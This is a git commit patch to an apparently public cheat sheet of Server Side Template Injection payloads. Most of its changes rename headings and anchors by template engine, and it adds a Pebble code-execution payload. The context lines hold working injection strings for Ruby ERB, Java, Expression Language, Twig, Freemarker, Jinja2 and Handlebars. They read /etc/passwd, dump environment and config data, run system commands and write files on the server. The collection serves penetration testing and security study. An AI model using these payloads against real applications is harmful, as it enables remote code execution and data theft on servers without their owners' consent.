From b641131f273c22b9f6286a927e83cb124fd559c6 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 17 Oct 2020 12:25:50 +0200 Subject: [PATCH] SSTI - Pebble update --- Server Side Template Injection/README.md | 133 ++++++++++++----------- 1 file changed, 67 insertions(+), 66 deletions(-) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index d35d4b0..643d7df 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -7,48 +7,48 @@ * [Tools](#tools) * [Methodology](#methodology) * [Ruby](#ruby) - * [Basic injections](#basic-injections) - * [Retrieve /etc/passwd](#retrieve--etc-passwd) - * [List files and directories](#list-files-and-directories) + * [Basic injections](#ruby---basic-injections) + * [Retrieve /etc/passwd](#ruby---retrieve--etc-passwd) + * [List files and directories](#ruby---list-files-and-directories) * [Java](#java) - * [Basic injection](#basic-injection) - * [Retrieve the system’s environment variables](retrieve-the-system-s-environment-variables) - * [Retrieve /etc/passwd](#retrieve--etc-passwd) + * [Basic injection](#java---basic-injection) + * [Retrieve the system’s environment variables](#java---retrieve-the-system-s-environment-variables) + * [Retrieve /etc/passwd](#java---retrieve--etc-passwd) * [Expression Language EL](#expression-language-el) - * [Basic injection](#basic-injection) - * [Code execution](#code-execution) + * [Basic injection](#expression-language-el---basic-injection) + * [Code execution](#expression-language-el---code-execution) * [Twig](#twig) - * [Basic injection](#basic-injection) - * [Template format](#template-format) - * [Arbitrary File Reading](#arbitrary-file-reading) - * [Code execution](#code-execution) + * [Basic injection](#twig---basic-injection) + * [Template format](#twig---template-format) + * [Arbitrary File Reading](#twig---arbitrary-file-reading) + * [Code execution](#twig---code-execution) * [Smarty](#smarty) * [Freemarker](#freemarker) - * [Basic injection](#basic-injection) - * [Code execution](#code-execution) -* [Peeble](#peeble) - * [Basic injection](#basic-injection) - * [Code execution](#code-execution) + * [Basic injection](#freemarker---basic-injection) + * [Code execution](#freemarker---code-execution) +* [Pebble](#pebble) + * [Basic injection](#pebble---basic-injection) + * [Code execution](#pebble---code-execution) * [Jade / Codepen](#jade---codepen) * [Velocity](#velocity) * [Mako](#mako) * [Jinja2](#jinja2) - * [Basic injection](#basic-injection) - * [Template format](#template-format) - * [Debug Statement](#debug-statement) - * [Dump all used classes](#dump-all-used-classes) - * [Dump all config variables](#dump-all-config-variables) - * [Read remote file](#read-remote-file) - * [Write into remote file](#write-into-remote-file) - * [Remote Code Execution](#remote-code-execution) - * [Filter bypass](filter-bypass) + * [Basic injection](#jinja2---basic-injection) + * [Template format](#jinja2---template-format) + * [Debug Statement](#jinja2---debug-statement) + * [Dump all used classes](#jinja2---dump-all-used-classes) + * [Dump all config variables](#jinja2---dump-all-config-variables) + * [Read remote file](#jinja2---read-remote-file) + * [Write into remote file](#jinja2---write-into-remote-file) + * [Remote Code Execution](#jinja2---remote-code-execution) + * [Filter bypass](#jinja2---filter-bypass) * [Jinjava](#jinjava) - * [Basic injection](#basic-injection) - * [Command execution](#command-execution) + * [Basic injection](#jinjava---basic-injection) + * [Command execution](#jinjava---command-execution) * [Handlebars](#handlebars) * [ASP.NET Razor](#aspnet-razor) - * [Basic injection](#basic-injection) - * [Command execution](#command-execution) + * [Basic injection](#aspnet-razor---basic-injection) + * [Command execution](#aspnet-razor---command-execution) * [References](#references) ## Tools @@ -68,7 +68,7 @@ python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment ## Ruby -### Basic injections +### Ruby - Basic injections ERB: @@ -82,19 +82,19 @@ Slim: #{ 7 * 7 } ``` -### Retrieve /etc/passwd +### Ruby - Retrieve /etc/passwd ```ruby <%= File.open('/etc/passwd').read %> ``` -### List files and directories +### Ruby - List files and directories ```ruby <%= Dir.entries('/') %> ``` -### Code execution +### Ruby - Code execution Execute code using SSTI for ERB engine. @@ -115,7 +115,7 @@ Execute code using SSTI for Slim engine. ## Java -### Basic injection +### Java - Basic injection ```java ${7*7} @@ -125,13 +125,13 @@ ${class.getResource("").getPath()} ${class.getResource("../../../../../index.htm").getContent()} ``` -### Retrieve the system’s environment variables +### Java - Retrieve the system’s environment variables ```java ${T(java.lang.System).getenv()} ``` -### Retrieve /etc/passwd +### Java - Retrieve /etc/passwd ```java ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')} @@ -141,14 +141,14 @@ ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().ex ## Expression Language EL -### Basic injection +### Expression Language EL - Basic injection ```java ${1+1} #{1+1} ``` -### Code Execution +### Expression Language EL - Code Execution ```java @@ -182,7 +182,7 @@ ${facesContext.getExternalContext().setResponseHeader("output","".getClass().for ## Twig -### Basic injection +### Twig - Basic injection ```python {{7*7}} @@ -191,7 +191,7 @@ ${facesContext.getExternalContext().setResponseHeader("output","".getClass().for {{app.request.server.all|join(',')}} ``` -### Template format +### Twig - Template format ```python $output = $twig > render ( @@ -205,13 +205,13 @@ $output = $twig > render ( ); ``` -### Arbitrary File Reading +### Twig - Arbitrary File Reading ```python "{{'/etc/passwd'|file_excerpt(1,30)}}"@ ``` -### Code execution +### Twig - Code execution ```python {{self}} @@ -241,11 +241,11 @@ email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld You can try your payloads at [https://try.freemarker.apache.org](https://try.freemarker.apache.org) -### Basic injection +### Freemarker - Basic injection The template can be `${3*3}` or the legacy `#{3*3}` -### Code execution +### Freemarker - Code execution ```js <#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")} @@ -255,13 +255,17 @@ ${"freemarker.template.utility.Execute"?new()("id")} ## Pebble -### Basic injection +### Pebble - Basic injection ```java {{ someString.toUPPERCASE() }} ``` -### Code execution +### Pebble - Code execution + +Old version of Pebble ( < version 3.0.9): `{{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') }}`. + +New version of Pebble : ```java {% set cmd = 'id' %} @@ -315,7 +319,7 @@ ${x} [Official website](http://jinja.pocoo.org/) > Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed. -### Basic injection +### Jinja2 - Basic injection ```python {{4*4}}[[5*5]] @@ -326,7 +330,7 @@ ${x} Jinja2 is used by Python Web Frameworks such as Django or Flask. The above injections have been tested on Flask application. -### Template format +### Jinja2 - Template format ```python {% extends "layout.html" %} @@ -340,7 +344,7 @@ The above injections have been tested on Flask application. ``` -### Debug Statement¶ +### Jinja2 - Debug Statement If the Debug Extension is enabled, a `{% debug %}` tag will be available to dump the current context as well as the available filters and tests. This is useful to see what’s available to use in the template without setting up a debugger. @@ -350,7 +354,7 @@ If the Debug Extension is enabled, a `{% debug %}` tag will be available to dump Source: https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement -### Dump all used classes +### Jinja2 - Dump all used classes ```python {{ [].class.base.subclasses() }} @@ -358,7 +362,7 @@ Source: https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement {{ ''.__class__.__mro__[2].__subclasses__() }} ``` -### Dump all config variables +### Jinja2 - Dump all config variables ```python {% for key, value in config.iteritems() %} @@ -367,7 +371,7 @@ Source: https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement {% endfor %} ``` -### Read remote file +### Jinja2 - Read remote file ```python # ''.__class__.__mro__[2].__subclasses__()[40] = File class @@ -375,13 +379,13 @@ Source: https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement {{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/tmp/flag").read() }} ``` -### Write into remote file +### Jinja2 - Write into remote file ```python {{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }} ``` -### Remote Code Execution +### Jinja2 - Remote Code Execution Listen for connexion @@ -424,7 +428,7 @@ In another GET parameter include a variable named "input" that contains the comm ``` -### Filter bypass +### Jinja2 - Filter bypass ```python request.__class__ @@ -464,7 +468,7 @@ Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by http ## Jinjava -### Basic injection +### Jinjava - Basic injection ```python {{'a'.toUpperCase()}} would result in 'A' @@ -473,7 +477,7 @@ Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by http Jinjava is an open source project developped by Hubspot, available at [https://github.com/HubSpot/jinjava/](https://github.com/HubSpot/jinjava/) -### Command execution +### Jinjava - Command execution Fixed by https://github.com/HubSpot/jinjava/pull/230 @@ -490,7 +494,7 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230 ## Handlebars -### Command Execution +### Handlebars - Command Execution ```handlebars {{#with "s" as |string|}} @@ -514,20 +518,15 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230 {{/with}} ``` -### References - -- [Handlebars template injection and RCE in a Shopify app ](https://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html) -- [Lab: Server-side template injection in an unknown language with a documented exploit](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-in-an-unknown-language-with-a-documented-exploit) - ## ASP.NET Razor -### Basic injection +### ASP.NET Razor - Basic injection ```powershell @(1+2) ``` -### Command execution +### ASP.NET Razor - Command execution ```csharp @{ @@ -554,3 +553,5 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230 * [Expression Language injection - PortSwigger](https://portswigger.net/kb/issues/00100f20_expression-language-injection) * [Bean Stalking: Growing Java beans into RCE - July 7, 2020 - Github Security Lab](https://securitylab.github.com/research/bean-validation-RCE) * [Remote Code Execution with EL Injection Vulnerabilities - Asif Durani - 29/01/2019](https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf) +* [Handlebars template injection and RCE in a Shopify app ](https://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html) +* [Lab: Server-side template injection in an unknown language with a documented exploit](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-in-an-unknown-language-with-a-documented-exploit) \ No newline at end of file